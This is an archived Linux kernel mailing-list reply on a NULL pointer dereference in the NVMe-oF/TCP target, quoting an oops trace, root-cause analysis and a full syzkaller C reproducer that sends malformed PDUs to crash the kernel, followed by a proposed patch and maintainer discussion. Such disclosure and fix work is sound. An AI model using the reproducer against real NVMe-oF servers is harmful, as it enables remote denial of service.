>> #PF: error_code(0x0000) - not-present page
>> PGD 0 P4D 0
>> Oops: 0000 [#1] PREEMPT SMP NOPTI
>> CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
>> Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
>> Reference Platform, BIOS 6.00 11/12/2020
>> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
>> RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
>> Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
>> d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
>> b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
>> RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
>> RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
>> RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
>> RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
>> R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
>> R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
>> FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
>> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
>> CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
>> PKRU: 55555554
>> Call Trace:
>>    <TASK>
>>    nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
>>    nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
>>    nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
>>    nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
>>    nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
>>    nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
>>    nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
>>    process_one_work+0x3da/0x870 kernel/workqueue.c:2597
>>    worker_thread+0x67/0x640 kernel/workqueue.c:2748
>>    kthread+0x164/0x1b0 kernel/kthread.c:389
>>    ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>>    </TASK>
>>
>> ## Description
>>
>> ### Tracing The Bug
>> The bug occurs during the execution of __nvmet_req_complete. Looking
>> in the report generated by syzkaller, we can see the exact line of
>> code that triggers the bug.
>>
>> Code Block 1:
>> ```
>> static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
>> {
>> struct nvmet_ns *ns = req->ns;
>>
>> if (!req->sq->sqhd_disabled) // 1
>> nvmet_update_sq_head(req);
>>
>>     ..
>> }
>> ```
>>
>> In the first code block, we can see that there is a dereference of
>> `req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
>> However, when executing the reproducer, `req->sq` is NULL. When trying
>> to dereference it, the kernel triggers a panic.
>>
>> ## Root Cause
>> `req` is initialized during `nvmet_req_init`. However, the sequence
>> that leads into `__nvmet_req_complete` does not contain any call for
>> `nvmet_req_init`, thus crashing the kernel with NULL pointer
>> dereference. This flow of execution can also create a situation where
>> an uninitialized memory address will be dereferenced, which has
>> undefined behaviour.
>>
>> ## Reproducer
>> I am adding a reproducer generated by Syzkaller with some
>> optimizations and minor changes.
>>
>> ```
>> // autogenerated by syzkaller (<https://github.com/google/syzkaller>)
>>
>> #define _GNU_SOURCE
>>
>> #include <endian.h>
>> #include <errno.h>
>> #include <fcntl.h>
>> #include <sched.h>
>> #include <stdarg.h>
>> #include <stdbool.h>
>> #include <stdint.h>
>> #include <stdio.h>
>> #include <stdlib.h>
>> #include <string.h>
>> #include <sys/mount.h>
>> #include <sys/prctl.h>
>> #include <sys/resource.h>
>> #include <sys/stat.h>
>> #include <sys/syscall.h>
>> #include <sys/time.h>
>> #include <sys/types.h>
>> #include <sys/wait.h>
>> #include <unistd.h>
>>
>> #include <linux/capability.h>
>>
>> uint64_t r[1] = {0xffffffffffffffff};
>>
>> void loop(void)
>> {
>>     intptr_t res = 0;
>>     res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>>     if (res != -1)
>>       r[0] = res;
>>     *(uint16_t*)0x20000100 = 2;
>>     *(uint16_t*)0x20000102 = htobe16(0x1144);
>>     *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>>     syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>>     *(uint8_t*)0x200001c0 = 0;
>>     *(uint8_t*)0x200001c1 = 0;
>>     *(uint8_t*)0x200001c2 = 0x80;
>>     *(uint8_t*)0x200001c3 = 0;
>>     *(uint32_t*)0x200001c4 = 0x80;
>>     *(uint16_t*)0x200001c8 = 0;
>>     *(uint8_t*)0x200001ca = 0;
>>     *(uint8_t*)0x200001cb = 0;
>>     *(uint32_t*)0x200001cc = 0;
>>     memcpy((void*)0x200001d0,
>>            "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
>>            "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
>>            "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35"
>>            "\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86"
>>            "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
>>            "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
>>            "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86",
>>            112);
>>     syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>>             /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>>     *(uint8_t*)0x20000080 = 6;
>>     *(uint8_t*)0x20000081 = 3;
>>     *(uint8_t*)0x20000082 = 0x18;
>>     *(uint8_t*)0x20000083 = 0x1c;
>>     *(uint32_t*)0x20000084 = 2;
>>     *(uint16_t*)0x20000088 = 0x5d;
>>     *(uint16_t*)0x2000008a = 3;
>>     *(uint32_t*)0x2000008c = 0;
>>     *(uint32_t*)0x20000090 = 7;
>>     memcpy((void*)0x20000094, "\\x83\\x9e\\x4f\\x1a", 4);
>>     syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
>>             /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>> }
>> int main(void)
>> {
>>     syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>>             /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>>     syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>>             /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>>     syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>>             /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>>     loop();
>>     return 0;
>> }
>> ```
>>
>>
> 
> 
> I'm not able to reproduce the problem [1], all I get is following error
> once I setup a target with nvmeof TCP and run the above program :-
> 
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
> 
> Can you try following patch? full disclosure I've compile tested
> and built this patch based on code inspection only :-

Yes, it looks like we are missing the same handling when we get a
malformed h2cdata pdu. If we want to gracefully fail it and keep the
connection going, we need to properly handle the failure.

Although, I didn't understand why should we try to intialize the request
in this case? its a clear error at this point...

> 
> diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
> index 92b74d0b8686..e35e8d79c66a 100644
> --- a/drivers/nvme/target/tcp.c
> +++ b/drivers/nvme/target/tcp.c
> @@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct
> nvmet_tcp_queue *queue)
>           }
> 
>           if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
> +               struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
> +               struct nvmet_req *req = &cmd->req;
> +
>                   pr_err("ttag %u unexpected data offset %u (expected %u)\n",
>                           data->ttag, le32_to_cpu(data->data_offset),
>                           cmd->rbytes_done);
> -               /* FIXME: use path and transport errors */
> -               nvmet_req_complete(&cmd->req,
> -                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> +
> +               memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
> +               if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
> +                               &queue->nvme_sq, &nvmet_tcp_ops))) {
> +                       pr_err("failed cmd %p id %d opcode %d, data_len:
> %d\n",
> +                               req->cmd, req->cmd->common.command_id,
> +                               req->cmd->common.opcode,
> + le32_to_cpu(req->cmd->common.dptr.sgl.length));
> +                       nvmet_tcp_handle_req_failure(queue, cmd, req);
> +               } else {
> +                       /* FIXME: use path and transport errors */
> +                       nvmet_req_complete(&cmd->req,
> +                                       NVME_SC_INVALID_FIELD |
> NVME_SC_DNR);
> +               }
>                   return -EPROTO;
>           }
> 
> I'll try to reproduce these problems, else will ping you offline...
> 
> -ck
> 
> [1]
> nvme (nvme-6.7) # nvme list
> Node                  Generic               SN
> Model                                    Namespace
> Usage                      Format           FW Rev
> --------------------- --------------------- --------------------
> ---------------------------------------- ---------
> -------------------------- ---------------- --------
> /dev/nvme1n1          /dev/ng1n1            408a5a6db1e890944886
> Linux                                    1           1.07  GB / 1.07
> GB    512   B +  0 B   6.6.0nvm
> /dev/nvme0n1          /dev/ng0n1            foo QEMU NVMe
> Ctrl                           1           1.07  GB / 1.07  GB    512
> B +  0 B   1.0
> nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_trtype
> tcp
> nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_traddr
> 127.0.0.1
> nvme (nvme-6.7) # ./a.out
> nvme (nvme-6.7) # dmesg  -c
> [22106.230605] loop: module loaded
> [22106.246494] run blktests nvme/004 at 2023-11-07 01:58:06
> [22106.279272] loop0: detected capacity change from 0 to 2097152
> [22106.294374] nvmet: adding nsid 1 to subsystem blktests-subsystem-1
> [22106.302392] nvmet_tcp: enabling port 0 (127.0.0.1:4420)
> [22106.320146] nvmet: creating nvm controller 1 for subsystem
> blktests-subsystem-1 for NQN
> nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349.
> [22106.320859] nvme nvme1: creating 48 I/O queues.
> [22106.326035] nvme nvme1: mapped 48/0/0 default/read/poll queues.
> [22106.336551] nvme nvme1: new ctrl: NQN "blktests-subsystem-1", addr
> 127.0.0.1:4420
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
> 
> 


^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2023-11-20 10:56 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-11-06 13:41 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete` Alon Zahavi
2023-11-06 21:35 ` Chaitanya Kulkarni
2023-11-07 10:03 ` Chaitanya Kulkarni
2023-11-09 13:17   ` Alon Zahavi
2023-11-15  9:02     ` Alon Zahavi
2023-11-20 10:56   ` Sagi Grimberg

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).